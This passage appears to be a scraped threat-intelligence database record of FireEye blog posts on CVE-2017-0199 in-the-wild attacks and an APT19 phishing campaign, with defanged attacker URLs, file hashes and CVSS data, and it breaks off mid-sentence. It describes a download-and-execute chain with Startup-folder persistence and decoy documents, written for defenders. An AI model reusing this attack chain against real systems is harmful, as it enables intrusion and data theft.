mshta.exe parses the file, finds the <script></script> tags and executes the contained script. Figure 6 shows the deobfuscated script.\n\n\n\nFigure 6: Second document, first stage VBScript\n\nFigure 6 shows the following malicious actions:\n\n 1. Terminate the winword.exe process with taskkill.exe to hide the prompt shown in Figure 1\n 2. Download an executable from http[:]//95.141.38[.]110/mo/dnr/copy.jpg, saving it to '%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winword.exe'\n 3. Download a document from http[:]//95.141.38[.]110/mo/dnr/docu.doc, saving it to %temp%\\document.doc\n 4. Clean up the Word Resiliency keys for Word versions 15.0 and 16.0, so that Microsoft Word will restart normally\n 5. Execute the malicious payload at '%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winword.exe'\n 6. Open the decoy document, %temp%\\document.doc, to hide the malicious activity from the user\n\nExamination of the malicious payload revealed that it is a variant of the dropper for what Microsoft calls [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), which has characteristics similar to FinFisher. The malware is heavily obfuscated with several anti-analysis measures, including a custom VM to slow analysis. A [blog post by \"Artem\"](<https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html>) covers a payload driver of WingBird. 
The blog author briefly mentions the protection techniques of the dropper, which match this sample.\n\n| MD5 | Size | Name | Description |\n|---|---|---|---|\n| c10dabb05a38edd8a9a0ddda1c9af10e | 70,269 | \u0421\u041f\u0423\u0422\u041d\u0418\u041a \u0420\u0410\u0417\u0412\u0415\u0414\u0427\u0418\u041a\u0410.doc | Malicious document |\n| 9dec125f006f787a3f8ad464d480eed1 | 27,500 | template.doc | Malicious HTA file |\n| acde6fb59ed431000107c8e8ca1b7266 | 1,312,768 | copy.jpg/winword.exe | Final payload |\n| e01982913fbc22188b83f5f9fadc1c17 | 6,220,783 | docu.doc/document.doc | Decoy document |\n\nTable 2: Second document metadata\n\n#### Conclusion\n\nFireEye observed CVE-2017-0199, a vulnerability in Microsoft Word that allows an attacker to execute a malicious Visual Basic script. The CVE-2017-0199 vulnerability is a logic bug and bypasses most mitigations. Upon execution of the malicious script, it downloads and executes malicious payloads, as well as displays decoy documents to the user. The two documents achieve execution of their malicious payloads, with one containing LATENTBOT and the other containing WingBird/FinFisher. The malicious document contained only a link to the attacker-controlled server, showing the advantage of FireEye\u2019s MVX engine to detect multi-stage attacks. Further campaigns leveraging this attack have been observed prior to patch availability, but are not covered in this blog.\n\nWe recommend that Microsoft Office users apply the [patch](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) as soon as possible.\n\n#### Acknowledgement\n\nThank you to Michael Matonis, Dhanesh Kizhakkinan, Yogesh Londhe, Swapnil Patil, Joshua Triplett, and Tyler Dean from FLARE Team, FireEye Labs Team, and FireEye iSIGHT Intelligence for their contributions to this blog. 
Thank you as well to everyone who worked with us at the Microsoft Security Response Center (MSRC).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-11T13:30:00", "type": "fireeye", "title": "CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-11T13:30:00", "id": "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "href": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-29T20:20:00", "description": "#### Summary\n\nIn May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government.\n\nAPT19 used three different techniques to attempt to compromise targets. 
In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>). Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one observed phishing lure delivered a Cobalt Strike payload.\n\nAs of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment firms for competitive economic purposes.\n\nThe purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide technical indicators that their IT personnel can use for proactive hunting and detection.\n\n#### The Emails\n\nAPT19 phishing emails from this campaign originated from sender email accounts from the \"@cloudsend[.]net\" domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for more details.\n\n#### The Attachments\n\nAPT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits. The following sections describe the two methods in further detail.\n\n##### RTF Attachments\n\nThrough the exploitation of the HTA handler vulnerability described in [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), the observed RTF attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer hosted at tk-in-f156.2bunny[.]com for further analysis. 
Figure 1 is a screenshot of a packet capture showing one of the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.\n\nFigure 1: RTF PCAP\n\n##### XLSM Attachments\n\nThe XLSM attachments contained multiple worksheets with content that reflected the attachment name. The attachments also contained an image that requested the user to \u201cEna